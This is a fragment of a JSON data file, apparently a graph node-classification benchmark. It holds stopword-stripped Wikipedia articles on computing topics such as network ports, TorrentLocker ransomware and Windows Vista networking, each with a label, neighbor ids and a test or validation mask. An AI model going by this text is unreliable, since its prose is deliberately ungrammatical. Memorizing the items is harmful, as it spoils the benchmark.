    "text": "Augmented_assignment:augmented assignment augmented assignment compound assignment name given certain assignment operators certain programming languages especially derived c augmented assignment generally used replace statement operator takes variable one arguments assigns result back variable simple example codice_1 expanded codice_2 similar constructions often available various binary operators general languages offering feature operators take variable one arguments return result type augmented assignment equivalent assigns result back variable place including arithmetic operators bitshift operators bitwise operators example following statement variation found many programs means find number stored variable x add 1 store result addition variable x simple seems may inefficiency location variable x looked twice compiler recognize two parts expression identical x might reference array element complexity comparison augmented assignment version version excuse compiler failing generate code looks location variable x modifies place course machine code supports sequence instance x simple variable machine code sequence might something like code would generated forms special op code might meaning modify memory adding 1 x decent compiler would generate code forms machine codes offer inc dec operations add subtract one others might allow constants one generally form stands operator always may special op codes help still possibility x complicated entity compiler encouraged avoid duplication accessing x course x lengthy name less typing required last basis similar feature algol compilers offered via burroughs b6700 systems using tilde symbol stand variable assigned would become forth general x =~ 1 producing optimum code would remain province compiler expression-oriented programming languages c assignment augmented assignment expressions value allows use complex expressions however produce sequences symbols difficult read understand worse mistype easily produce different sequence gibberish although accepted compiler produce desired results languages python assignment augmented assignment statements expressions thus used complex expressions example following valid c valid python assignment languages augmented assignment form right-associative assignment languages c c++ python augmented assignment assignment location includes function calls mandated call functions i.e statement function codice_3 mandated called language implements augmented assignment macro expansion codice_3 called twice c c++ c assignment operator augmented follows called compound assignment operator said languages following list though complete all-inclusive lists major programming languages support augmented assignment operators",
    "neighbors": [
      512,
      515,
      3462,
      8582,
      6160,
      4507,
      1435,
      9245,
      5663,
      1952,
      9385,
      5165,
      5677,
      2045,
      10435,
      8644,
      5703,
      847,
      7889,
      10470,
      8554,
      240,
      3705,
      7292,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 8386,
    "label": 5,
    "text": "Port_(computer_networking):port computer networking computer networking port communication endpoint physical well wireless connections terminated ports hardware devices software level within operating system port logical construct identifies specific process type network service ports identified protocol address combination 16-bit unsigned numbers commonly known port number common protocols use port numbers transmission control protocol tcp user datagram protocol udp port number always associated ip address host protocol type communication completes destination origination network address message specific port numbers commonly reserved identify specific services arriving packet easily forwarded running application purpose lowest numbered 1024 port numbers identify historically commonly used services called well-known port numbers higher-numbered ports available general use applications known ephemeral ports used service enumeration ports provide multiplexing service multiple services multiple communication sessions one network address client–server model application architecture multiple simultaneous communication sessions may initiated service port number 16-bit unsigned integer thus ranging 0 65535 tcp port number 0 reserved used udp source port optional value zero means port process associates input output channels via internet socket type file descriptor transport protocol ip address port number known binding enables process send receive data via network operating system networking software task transmitting outgoing data application ports onto network forwarding arriving network packets processes matching packet ip address port number tcp one process may bind specific ip address port combination common application failures sometimes called port conflicts occur multiple programs attempt use port number ip address protocol applications implementing common services often use specifically reserved well-known port numbers receiving service requests clients process known listening involves receipt request well-known port establishing one-to-one server-client dialog using local port number clients may continue connect listening port works tcp connection identified tuple consisting local address local port remote address remote port well-known ports defined convention overseen internet assigned numbers authority iana core network services world-wide web typically use well-known port numbers many operating systems special privileges required applications bind ports often deemed critical operation ip networks conversely client end connection typically uses high port number allocated short term use therefore called ephemeral port internet assigned numbers authority iana responsible global coordination dns root ip addressing internet protocol resources includes registration commonly used port numbers well-known internet services port numbers divided three ranges well-known ports registered ports dynamic private ports well-known ports also known system ports 0 1023 requirements new assignments range stricter registrations examples include registered ports 1024 49151 iana maintains official list well-known registered ranges dynamic private ports 49152 65535 one common use range ephemeral ports transport layer protocols transmission control protocol tcp user datagram protocol udp transfer data using protocol data units pdus tcp pdu segment datagram udp protocols use header field recording source destination port number port numbers encoded transport protocol packet header readily interpreted sending receiving computers also components networking infrastructure particular firewalls commonly configured differentiate packets based source destination port numbers port forwarding example application practice attempting connect range ports sequence single computer commonly known port scanning usually associated either malicious cracking attempts network administrators looking possible vulnerabilities help prevent attacks port connection attempts frequently monitored logged computers technique port knocking uses series port connections knocks client computer enable server connection example use ports internet mail system server used sending receiving email generally needs two services first service used transport email servers accomplished simple mail transfer protocol smtp smtp service application usually listens tcp port 25 incoming requests second service usually either post office protocol pop internet message access protocol imap used e-mail client applications users personal computers fetch email messages server pop service listens tcp port number 110 services may running host computer case port number distinguishes service requested remote computer user computer another mail server listening port number server well defined iana calls well-known ports client port number often chosen dynamic port range see applications clients server use specific port numbers assigned iana good example dhcp client always uses udp port 68 server always uses udp port 67 port numbers sometimes seen web uniform resource locators urls default http uses port 80 https uses port 443 url like nowiki http //www.example.com:8080/path/ /nowiki specifies web browser connects instead port 8080 http server concept port numbers established early developers arpanet informal co-operation software authors system administrators term port number yet used time preceded use term socket number early development stages network socket number remote host 40-bit quantity first 32 bits similar today ipv4 address time most-significant 8 bits host number least-significant portion socket number bits 33 40 entity called another eightbit number abbreviated aen today network socket refers related distinct concept namely internal address endpoint used within node march 26 1972 vint cerf jon postel called documenting then-current usages establishing socket number catalog rfc 322 network administrators asked submit note place phone call describing function socket numbers network service programs host catalog subsequently published rfc 433 december 1972 included list hosts port numbers corresponding function used host network first registry function served primarily documentation usage indicated port number usage conflicting hosts useful public services document promised resolution conflicts based standard postel published may 1972 rfc 349 first proposed official assignments port numbers network services suggested dedicated administrative function called czar maintain registry 256 values aen divided following ranges telnet service received first official assignment value 1 detail first set assignments early arpanet aen also called socket name used initial connection protocol icp component network control program ncp ncp forerunner modern internet protocols today terminology service name still closely connected port numbers former text strings used network functions represent numerical port number",
    "neighbors": [
      5251,
      7430,
      2695,
      5387,
      1164,
      6541,
      14,
      8204,
      4240,
      3218,
      5652,
      11413,
      3094,
      11162,
      5531,
      6813,
      10271,
      10274,
      9380,
      933,
      2085,
      5543,
      3752,
      6567,
      6825,
      8998,
      4396,
      10924,
      2222,
      7214,
      7983,
      6577,
      2994,
      11566,
      9909,
      8504,
      11321,
      3133,
      829,
      4797,
      11197,
      7361,
      2430,
      11202,
      7364,
      6982,
      2887,
      4423,
      8905,
      11591,
      3792,
      849,
      6993,
      979,
      5843,
      6614,
      5723,
      5085,
      6877,
      7908,
      1125,
      3941,
      10341,
      10344,
      11112,
      9834,
      4589,
      11249,
      5363,
      3956,
      119,
      11001,
      6651,
      3581,
      2558,
      9591
    ],
    "mask": "Test"
  },
  {
    "node_id": 8387,
    "label": 4,
    "text": "TorrentLocker:torrentlocker torrentlocker ransomware trojan targeting microsoft windows first observed february 2014 least five major releases made available december 2014 malware encrypts victim files similar manner cryptolocker implementing symmetric block cipher aes key encrypted asymmetric cipher torrentlocker scans system programs files conceals contents aes encryption leaving ransom instructions victim done pay decryption ransom operator demands victim amount usually starts around within 3 days victim told pay amount bitcoins sent unique bitcoin address differs infected user",
    "neighbors": [
      3072,
      3969,
      6786,
      7044,
      10245,
      10756,
      7304,
      11401,
      9356,
      6797,
      9233,
      8978,
      4863,
      4883,
      150,
      535,
      278,
      10392,
      1690,
      2075,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      9771,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      4165,
      2508,
      467,
      7515,
      4344,
      8674,
      3941,
      107,
      877,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 8388,
    "label": 2,
    "text": "ORVYL_and_WYLBUR:orvyl wylbur orvyl timesharing monitor developed stanford university ibm system/360 system/370 computers 1967–68 orvyl one first time-sharing systems made available ibm computers wylbur text editor word processor program designed work either without orvyl conjunction orvyl names orvyl wylbur often used interchangeably wylbur full standalone operating system mold dartmouth time sharing system dtss unix instead runs top ibm batch operating system os/360 svs mvs takes form editor remote job entry system thus much relationship ibm operating systems emacs unix reasons wylbur often thought text editor rather time-sharing system however whereas unix need emacs provide text editing services ibm operating systems originally needed wylbur later innovations ibm time sharing option tso made wylbur less relevant ibm users gradually replaced article use full upper case spelling commands keywords references characters string assume ebcdic code page orvyl wylbur used stanford linear accelerator center slac european organization nuclear research cern u.s. national institutes health nih many sites retired sites late 1990s owing concerns y2k issues remained use nih december 2009 orvyl wylbur still available open source stanford also proprietary versions superwylbur orvyl wylbur much admired shown excerpt 2004 article titled computing cern mainframe era orvyl wylbur first became available 1967-68 tss/360 tso official time-sharing solution ibm roughly time third-party time-sharing systems mts became available radar development effort cp-67 ibm cambridge scientific center took place wylbur additional advantage could used conjunction ibm mainstream operating system os/360 wylbur single-address-space system unlike tso conserved memory days memory precious even tso available organizations seeking minimize memory use would often keep even majority users wylbur rather letting use tso interactive environment wylbur provides compressed partitioned data sets pdss aka libraries save disk space mvs source code typically stored sequence card images 80 character lines line contained one characters 80 characters still used store line even data e.g. source code stored variable blocked vb space could wasted strings embedded blanks wylbur implements stream-oriented storage text pdss sequential data sets one character line might take 16 characters line length offset chunk length character rather 80 store wylbur external program run via jcl used convert files wylbur edit format although tso allows user locked-down wylbur system possible write wylbur exec scripts execute batch jobs perform functions ordinarily would required tso account filling batch job skeleton parameters submitting batch job retrieving output displaying screen wylbur security advantages tso disadvantages advantages include disadvantages related security included wylbur special edit format wylbur data sets compressed line number revision flag line addition wylbur supports standard fb vb datasets wylbur user normally specifies default volume may special word catlg requesting search catalogue existing dataset requesting new dataset cataloged wylbur ability convert line numbers edit ibm data sets either scaled integers explicit decimal point wylbur provides line editor works temporary data sets similar buffers editors point time one temporary data sets designated default wylbur maintains current line pointer temporary data set user may specify explicit working data set command omits default temporary data set used working data set unit operation set lines associative range individual lines identified line number range 0.0 99999.999 leading zeros integer part trailing zeros fractional part may omitted user specify line number following ways wylbur libraries nonstandard format however allows user export native os files integer sequence numbers import native os files integer sequence rescale line number factor 1000 range specified combination pattern similar regular expression syntax closer snobol unix perl backtracking nih wylbur capture subpatterns pattern may sample commands change 73/80 x10+10 every 3rd line 'abc 1/3 1.5-2/3.7+2 copy 'bal 10/15 emd change 73/80 every 3rd line start 2 'bal 10/15 change digits*3 substring 2/4 specification base+increment means replacement text first line base incremented subsequent lines x10+10 replaces matched text first line x10 second line x20 third line x30 specification substring 2/4 means columns 2-4 matched string note less flexible captures various organizations developed enhanced versions wylbur included superwylbur several enhancements original wylbur important macro processor adds commands constants functions expressions wylbur even command syntax include parameters defined expressions user use forms expression expression force evaluation expression function argument variable parentheses may omitted e.g. .time instead .time doubled requests valued quoted superwylbur two types constants superwylbur operators whose names contain special characters need separated spaces operators whose names contain period letters must separated spaces superwylbur following types operators name macro function begins period arguments colon separates name semicolon separates successive arguments superwylbur provides following types macro functions arithmetic functions accounting functions date time conversion parameters default current date time environmental queries return values set commands full screen functions jes functions macro functions string functions working file functions arguments default current default working data set complete list macro functions pseudofunctions like functions except appear left hand side assignment e.g. let foo bar baz",
    "neighbors": [
      2560,
      7,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      2625,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      9829,
      6248,
      6760,
      8298,
      9835,
      10856,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      2172,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9361,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      7848,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      1219,
      6342,
      1736,
      2248,
      9932,
      5840,
      1235,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      2811,
      9468,
      2813,
      1278,
      10499,
      1804,
      10508,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      3359,
      10016,
      292,
      10235,
      2345,
      1323,
      7983,
      2355,
      7477,
      823,
      10040,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      10569,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      863,
      3426,
      868,
      3429,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      6529,
      10113,
      4996,
      8069,
      8582,
      394,
      3978,
      4492,
      7053,
      8077,
      7057,
      11667,
      11673,
      11675,
      8092,
      6557,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      5562,
      6075,
      6078,
      9151,
      11204,
      11205,
      1478,
      4040,
      8136,
      9166,
      477,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 8389,
    "label": 4,
    "text": "MailXaminer:mailxaminer mailxaminer digital forensic program built allow examination email messages web application based email clients application developed systools inc slogan ‘ simplifying email forensics ’ mailxaminer first loads messages chosen email storage source arranges hierarchically purpose evidence analysis extraction product name derived combination ‘ mail ’ ‘ examiner ’ denoting platform examine emails programming application provides carving deleted evidence evidence damaged sources cases evidence spoliation post analysis software serves output generation court admissible digital formats e.g concordance adobe pdf systools official developer mailxaminer launched first release december 1 2013 subsequent allotment official product licensing constant screening mailxaminer given systools inc. present stable release product version 4.9 launched year 2014 added capabilities serving skin tone analysis link analysis timeline analysis program helped achieve level refurbishment act improvement process email examination procedure since launch support forensic disk image optical character recognition format skype database analysis also added application since one upgrades support limited email storage formats imaged within file owing email examination theme application currently application serving legal departments law enforcement agencies government sectors sectors requirement investigation email messages",
    "neighbors": [
      5857,
      5284,
      9319,
      2218,
      6797,
      7983,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 8390,
    "label": 3,
    "text": "VAXmate:vaxmate vaxmate ibm pc/at compatible personal computer introduced digital equipment corporation september 1986 replacement rainbow 100 standard form first commercial diskless personal computer operating system files could served vax/vms server running company vax/vms services ms-dos software went several name changes finally becoming pathworks alternatively optional expansion box containing either 20 mb 40 mb hard disk could purchased allowed operate conventional stand-alone pc basic system contained 8 mhz intel 80286 cpu 1 mbyte ram 1.2 mb rx33 5¼-inch floppy disk drive 14-inch diagonal amber green monochrome crt thinwire ethernet interface contained system unit also provided parallel printer port serial communications port separate mouse lk250 keyboard used device well expansion box 80287 numeric coprocessor could ordered option memory could expanded 2 mb another option 3 mb north america internal modem also available superseded decstation 200 300 january 1989",
    "neighbors": [
      7234,
      3142,
      3945,
      10220,
      9742,
      5873,
      6129,
      499,
      11604,
      8474,
      9723,
      8732
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8391,
    "label": 2,
    "text": "Windows_Vista_networking_technologies:windows vista networking technologies computing microsoft windows vista windows server 2008 introduced 2007/2008 new networking stack named next generation tcp/ip stack improve previous stack several ways stack includes native implementation ipv6 well complete overhaul ipv4 new tcp/ip stack uses new method store configuration settings enables dynamic control require computer restart change settings new stack implemented dual-stack model depends strong host-model features infrastructure enable modular components one dynamically insert remove next generation tcp/ip stack connects nics via network driver interface specification ndis driver network stack implemented codice_1 implements transport network data link layers tcp/ip model transport layer includes implementations tcp udp unformatted raw protocols network layer ipv4 ipv6 protocols implemented dual-stack architecture data link layer also called framing layer implements 802.3 802.1 ppp loopback tunnelling protocols layer accommodate windows filtering platform wfp shims allows packets layer introspected also host wfp callout api networking api exposed via three components user interface configuring troubleshooting working network connections changed significantly prior versions windows well users make use new network sharing center see status network connections access every aspect configuration single icon notification area system tray represents connectivity network adapters whether wired wireless network browsed using network explorer replaces windows xp network places network explorer items shared device scanner file share network location awareness nla service uniquely identifies network exposes network attributes connectivity type applications determine optimal network configuration however applications use nla apis explicitly aware network connectivity changes adapt accordingly windows vista uses link layer topology discovery lltd protocol graphically present different devices connected network network map addition network map uses lltd determine connectivity information media type wired wireless map topologically accurate ability know network topology important diagnosing solving networking problems streaming content network connection device implement lltd appear network map icon representing device allowing users one-click access device user interface lltd invoked provides metadata device contains static state information mac address ipv4/ipv6 address signal strength etc windows vista classifies networks connects either public private domain uses network location awareness switch network types different network types different firewall policies open network public wireless network classified public restrictive network settings mode computers network trusted external access computer including sharing files printers disabled home network classified private enables file sharing computers computer joined domain network classified domain network network policies set domain controller network first connected windows vista prompts choose correct network type subsequent connections network service used gain information network connected automatically switch network configuration connected network windows vista introduces concept network profiles network system stores ip address dns server proxy server network features specific network network profile network subsequently connected settings need reconfigured ones saved profile used case mobile machines network profiles chosen automatically based networks available profile part either public private domain network windows vista networking stack supports dual internet protocol ip layer architecture ipv4 ipv6 implementations share common transport framing layers windows vista provides gui configuration ipv4 ipv6 properties ipv6 supported networking components services windows vista dns client use ipv6 transport internet explorer windows vista applications use wininet windows mail file sharing support literal ipv6 addresses windows firewall ipsec policies snap-in support ipv6 addresses permissible character strings ipv6 mode windows vista use link local multicast name resolution llmnr protocol described resolve names local hosts network dns server running service useful networks without central managing server ad hoc wireless networks ipv6 also used ppp-based dial-up pppoe connections windows vista also act client/server file sharing dcom ipv6 support dhcpv6 used ipv6 also included ipv6 even used full native ipv6 connectivity available using teredo tunneling even traverse ipv4 symmetric network address translations nats well full support multicast also included via mldv2 ssm protocols ipv6 interface id randomly generated permanent autoconfigured ipv6 addresses prevent determining mac address based known company ids nic manufacturers support wireless networks built network stack new set apis called native wifi emulate wired connections case previous versions windows allows implementation wireless-specific features larger frame sizes optimized error recovery procedures native wifi exposed auto configuration module acm replaces windows xp wireless zero configuration acm extensible developers incorporate additional wireless functionality automatic wireless roaming override automatic configuration connection logic without affecting built-in framework easier find wireless networks range tell networks open closed hidden wireless networks advertise name ssid better supported security wireless networks improved improved support newer wireless standards like 802.11i eap-tls default authentication mode connections made secure connection level supported wireless access point wpa2 used even ad-hoc mode windows vista also provides fast roaming service allow users move one access point another without loss connectivity preauthentication new wireless access point used retain connectivity wireless networks managed either connect network dialog box within gui netsh wlan command shell settings wireless networks also configured using group policy windows vista enhances security joining domain wireless network use single sign use credentials join wireless network well domain housed within network case radius server used peap authentication joining network ms-chap v2 authentication log domain bootstrap wireless profile also created wireless client first authenticates computer wireless network joins network stage machine still access domain resources machine run script stored either system usb thumb drive authenticates domain authentication done either using username password combination security certificates public key infrastructure pki vendor verisign windows vista features windows connect supports setting wireless network using several methods supported wi-fi protected setup standard implements native code api web services devices wsdapi support devices profile web services dpws also managed code implementation wcf dpws enables simpler device discoverability like upnp describes available services clients function discovery new technology serves abstraction layer applications devices allowing applications discover devices referencing device function rather bus type nature connection plug play extensions pnp-x allow network-connected devices appear local devices inside windows connected physically upnp support also enhanced include integration pnp-x function discovery windows vista networking stack also uses several performance optimizations allow higher throughput allowing faster recovery packet losses using high packet loss environment wireless networks windows vista uses newreno algorithm allows sender send data retrying case receives partial acknowledgement acknowledgement receiver part data received also uses selective acknowledgements sack reduce amount data retransmitted case portion data sent received correctly forward rto-recovery f-rto prevent unnecessary retransmission tcp segments round trip time increases also includes neighbour unreachability detection capability ipv4 ipv6 tracks accessibility neighboring nodes allows faster error recovery case neighboring node fails ndis 6.0 introduced windows vista supports offloading ipv6 traffic checksum calculations ipv6 improved manageability scalability performance reduced complexity ndis miniports simpler models writing lightweight filter drivers lwf lwf drivers combination ndis intermediate drivers miniport driver eliminate need write separate protocol miniport bypass mode examine selected control data paths tcp/ip stack also provides fail-back support default gateway changes periodically attempting send tcp traffic previously detected unavailable gateway provide faster throughput sending traffic primary default gateway subnet another significant change aims improve network throughput automatic resizing tcp receive window receive window rwin specifies much data host prepared receive limited among things available buffer space words measure much data remote transmitter send requiring acknowledgement outstanding data receive window small remote transmitter frequently find hit limit much outstanding data transmit even though enough bandwidth available transmit data leads incomplete link utilization using larger rwin size boosts throughput situations auto-adjusting rwin tries keep throughput rate high permissible bandwidth link receive window auto tuning functionality continually monitors bandwidth latency tcp connections individually optimize receive window connection window size increased high-bandwidth ~5 mbit/s+ high-latency 10ms situations traditional tcp implementations uses tcp slow start algorithm detect fast transmit without choking receiver intermediate nodes nutshell specifies transmission start slow rate transmitting packets number controlled congestion window – specifies number outstanding packets transmitted acknowledgement receipt receiver yet received acknowledgements received congestion window expanded one tcp segment time till acknowledgement fails arrive sender assumes congestion window size instant network gets congested however high bandwidth network sustain quite large congestion window without choking slow start algorithm take quite time reach threshold – leaving network under-utilized significant time new tcp/ip stack also supports explicit congestion notification ecn keep throughput hit due network congestion low possible without ecn tcp message segment dropped router buffer full hosts get notice building congestion packets start dropped sender detects segment reach destination due lack feedback congested router information extent reduction transmission rate needs make standard tcp implementations detect drop time waiting acknowledgement receiver sender reduces size congestion window limit amount data flight time multiple packet drops even result reset congestion window tcp maximum segment size tcp slow start exponential backoff additive increase produce stable network behaviour letting routers recover congestion however dropping packets noticeable impacts time-sensitive streams like streaming media takes time drop noticed retransmitted ecn support enabled router sets two bits data packets indicate receiver experiencing congestion yet fully choked receiver turn lets sender know router facing congestion sender lowers transmission rate amount router still congested set bits eventually sender slow even advantage approach router get full enough drop packets thus sender lower transmission rate significantly cause serious delays time-sensitive streams risk severe under-utilization bandwidth without ecn way routers tell hosts anything dropping packets ecn like random early drop except packets marked instead dropped caveat sender receiver well intermediate routers ecn-friendly router along way prevent use ecn considers ecn-marked packets invalid drops typically whole connection setup fails piece network equipment drops connection setup packets ecn flags set routers n't know ecn still drop packets normally ecn-hostile network equipment internet reason ecn disabled default enabled via codice_2 command previous versions windows processing needed receive transfer data one network interface done single processor even multi processor system supported network interface adapters windows vista distribute job traffic processing network communication among multiple processors feature called receive side scaling windows vista also supports network cards tcp offload engine certain hardware-accelerated tcp/ip-related functionality windows vista uses tcp chimney offload system offload cards framing routing error-correction acknowledgement retransmission jobs required tcp however application compatibility tcp data transfer functionality offloaded nic tcp connection setup remove load cpu traffic processing ipv4 ipv6 offloaded windows vista also supports netdma uses dma engine allow processors freed hassles moving data network card data buffers application buffers requires specific hardware dma architectures intel i/o acceleration enabled compound tcp modified tcp congestion avoidance algorithm meant improve networking performance applications enabled default pre-service pack 1 version windows vista enabled sp1 windows server 2008 uses different algorithm modify congestion window – borrowing tcp vegas tcp new reno every acknowledgement received increases congestion window aggressively thus reaching peak throughput much faster increasing overall throughput windows vista networking stack includes integrated policy-based quality service qos functionality prioritize network traffic quality service used manage network usage specific applications users throttling bandwidth available used limit bandwidth usage applications high priority applications real time conferencing applications run ensure get bandwidth need traffic throttling also used prevent large data transfer operations using available bandwidth qos policies confined application executable name folder path source destination ipv4 ipv6 addresses source destination tcp udp ports range ports windows vista qos policies applied application network layer thus eliminating need rewrite applications using qos apis qos-aware qos policies either set per-machine basis set active directory group policy objects ensures windows vista clients connected active directory container domain site organizational unit enforce policy settings windows vista supports wireless multimedia wmm profile classes qos wireless networks certified wi-fi alliance bg background data best effort non real time data vi real time videos vo real time voice data wireless access point well wireless nic supports wmm profiles windows vista provide preferential treatment data sent windows vista includes specialized qos api called qwave quality windows audio/video experience pre-configured quality service module time dependent multimedia data audio video streams qwave uses different packet priority schemes real-time flows multimedia packets best-effort flows file downloads e-mails ensure real-time data gets little delays possible providing high quality channel data packets qwave intended ensure real-time transport multimedia networks within wireless network qwave supports multiple simultaneous multimedia well data streams qwave depend solely bandwidth reservation schemes provided rsvp providing qos guarantees bandwidth wireless network fluctuates constantly result also uses continuous bandwidth monitoring implement service guarantees applications explicitly use qwave apis use service multimedia application requests qwave initiate new media stream qwave tries reserve bandwidth using rsvp time uses qos probes make sure network enough bandwidth support stream conditions met stream allowed prioritized applications eat share bandwidth however environmental factors affect reception wireless signals reduce bandwidth even stream allowed access reserved bandwidth due qwave continuously monitors available bandwidth decreases application informed creating feedback loop adapt stream fit lower bandwidth range bandwidth available qwave automatically reserves informs application improvement probing quality network probe packets sent source statistics round trip time loss latency jitter etc path analyzed results cached probe repeated specific time intervals update cache whenever stream requested cache looked qwave also serializes creation multiple simultaneous streams even across devices probes sent one stream interfered others qwave uses client side buffers keep transmission rate within range slowest part network access point buffers overwhelmed thus reducing packet loss qwave works best source sink client multimedia stream qwave aware also wireless access point ap needs qos-enabled supporting bandwidth reservation also work without qos-aware aps however since qwave reserve bandwidth case depend application adapt stream based available bandwidth affected network conditions data network well qwave also available devices part windows rally technologies order provide better security transferring data network windows vista provides enhancements cryptographic algorithms used obfuscate data support 256-bit 384-bit 512-bit elliptic curve diffie–hellman ecdh algorithms well 128-bit 192-bit 256-bit advanced encryption standard aes included network stack direct support ssl connections new winsock api allows socket applications directly control security traffic network providing security policy requirements traffic querying security settings rather add extra code support secure connection computers running windows vista part logically isolated networks within active directory domain computers logical network partition able access resources domain even though systems may physically network unless logical partition wo n't able access partitioned resources system may part multiple network partitions windows vista also includes extensible authentication protocol host eaphost framework provides extensibility authentication methods commonly used protected network access technologies 802.1x ppp allows networking vendors develop easily install new authentication methods known eap methods planned feature new tcp/ip suite known routing compartments utilized per-user routing table thus compartmentalizing network according user needs data one segment would go another feature however removed release windows vista slated included possibly future release windows windows vista also introduces network access protection nap makes sure computers connecting network conform required level system health set administrator network nap enabled network windows vista computer attempts join network verified computer up-to-date security updates virus signatures factors including configuration ipsec 802.1x authentication settings specified network administrator granted full access network criteria met failing may either denied access network granted limited access certain resources may optionally granted access servers provide latest updates updates installed computer granted access network however windows vista nap client i.e. client computer connects nap enabled network health policy verification servers running windows server 2008 ipsec configuration fully integrated windows firewall advanced security snap-in netsh advfirewall command-line tool prevent contradictory rules offer simplified configuration along authenticating firewall advanced firewall filtering rules exceptions ipsec policies set domain public private profiles source destination ip addresses ip address range source destination tcp udp ports multiple ports specific types interfaces icmp icmpv6 traffic type code services edge traversal ipsec protection state specified users computers based active directory accounts prior windows vista setting maintaining ipsec policy configuration many scenarios required setting set rules protection another set rules traffic exemptions ipsec nodes windows vista communicate simultaneously negotiating protected communications response received negotiation completes subsequent communications protected eliminates need set ipsec filters exemptions set hosts support ipsec allows setting required incoming protected initiated communication optional outgoing communication ipsec also allows securing traffic domain controllers member computers still allowing clear text domain joins communication types ipsec protected domain joins allowed using ntlm v2 domain controllers member computers running windows server 2008 windows vista respectively ipsec fully supports ipv6 authip allows second authentication integration nap authenticating health certificate network diagnostics framework support failed ipsec negotiation new ipsec performance counters improved detection cluster node failure faster renegotiation security associations support stronger algorithms main mode negotiation stronger dh algorithms suite b data integrity encryption aes cbc aes-gmac sha-256 aes-gcm ability assist user diagnosing network problem expected major new networking feature extensive support runtime diagnostics wired wireless networks including support tcp management information base mib -ii better system event logging tracing vista tcp/ip stack also supports estats defines extended performance statistics tcp help determining cause network performance bottlenecks windows vista inform user causes network transmission failure incorrect ip address incorrect dns default gateway settings gateway failure port use blocked receiver ready dhcp service running netbios tcp/ip name resolution failure etc transmission errors also exhaustively logged analyzed better find cause error windows vista greater awareness network topology host computer using technologies universal plug play new network awareness technology windows vista provide help user fixing network issues simply provide graphical view perceived network configuration windows vista network stack includes windows filtering platform allows external applications access hook packet processing pipeline networking subsystem wfp allows incoming outgoing packets filtered analyzed modified several layers tcp/ip protocol stack wfp inbuilt filtering engine applications need write custom engine need provide custom logic engine use wfp includes base filtering engine implements filter requests packets processed using generic filtering engine also includes callout module applications providing custom processing logic hooked wfp put uses inspecting packets malware selective packet restriction firewalls providing custom encryption systems among others upon initial release wfp plagued bugs including memory leaks race conditions windows firewall windows vista implemented wfp windows vista includes significant peer-to-peer support introduction new apis protocols new version peer name resolution protocol pnrp v2 well set peer distributed routing table peer graphing peer grouping peer naming peer identity management apis introduced contacts created administered new peer-to-peer subsystem—serverless presence allows users manage real-time presence information track presence registered users across subnet internet new people near service allows discovery management contacts subnet uses windows contacts manage store contact information new capabilities allows peers send application invitations peers ad-hoc collaboration also supported without centralized server windows meeting space example application pnrp also allows creating overlay network called graph peer overlay network corresponds node graph nodes graph share book-keeping information responsible functioning network whole example distributed resource management network node resource needs shared information shared records flooded peers graph peer stores record local database record consists header body body contains data specific application using api header contains metadata describe data body name-value pairs serialized using xml addition author version information also contain index body data fast searching node connect nodes directly well communication need shared entire graph api also allows creation secure overlay network called group consisting subset nodes graph group shared multiple applications unlike graph peers group must identifiable unique named registered using pnrp digital signature certificate termed group member certificate gmc records exchanged digitally signed peers must invited group invitation contains gmc enables join group new windows internet computer names wicn peer networking feature allows ipv6-connected machine obtain custom unique domain name computer connected internet users specify secured unsecured host name computer console command without requiring register domain name configuring dynamic dns wicn used application accepts ip address dns name pnrp performs domain name resolution peer-to-peer level another planned feature windows vista would provided new domain-like networking setup known castle make release castle would made possible identification service provides user authentication members network without centralized server would allowed user credentials propagate across peer-to-peer network making suitable home network people near formerly people nearby peer-to-peer service designed simplify communication collaboration among users connected subnet people near used windows meeting space collaboration contact discovery people near listed part microsoft mobile platform strategy revealed windows hardware engineering conference 2004 people near uses windows contacts manage contact information default user may receive invitations users connected subnet user designate another user trusted contact enable collaboration across internet increase security determine presence contacts new background intelligent transfer service bits 3.0 new feature called neighbor casting supports peer-to-peer file transfers within domain facilitates peer caching allows users download serve content wsus updates peers subnet receive notification file downloaded access temporary file download progress control http redirects saves bandwidth network reduces performance load server bits 3.0 also uses internet gateway device protocol counters accurately calculate available bandwidth http kernel mode driver windows vista http.sys enhanced support server-side authentication logging idn hostnames event tracing better manageability netsh http new performance counters wininet protocol handler http ftp handles ipv6 literal addresses includes support gzip deflate decompression improve content encoding performance internationalized domain names support event tracing winhttp client api server-based applications services supports ipv6 autoproxy http/1.1 chunked transfer encoding larger data uploads ssl client certificates server proxy authentication automatic handling redirects keep-alive connections http/1.0 protocol including support keep-alive persistent connections session cookies winsock updated new apis support event tracing winsock layered service provider support enhanced logged installations removals new api reliably installing lsps command reliably remove lsps facilities categorize lsps remove lsps processing path system critical services support network diagnostics framework winsock kernel wsk new transport-independent kernel-mode network programming interface npi provides tdi client developers sockets-like programming model similar supported user-mode winsock sockets programming concepts exist user-mode winsock socket creation bind connect accept send receive winsock kernel completely new programming interface unique characteristics asynchronous i/o uses irps event callbacks enhance performance tdi supported windows vista backward compatibility new version server message block smb protocol introduced windows vista number changes improve performance add additional capabilities windows vista later operating systems use smb 2.0 communicating machines running windows vista later smb 1.0 continues use connections previous version windows samba samba 3.6 also includes support smb 2.0 remote differential compression rdc client-server synchronization protocol allows data synchronized remote source using compression techniques minimize amount data sent across network synchronizes 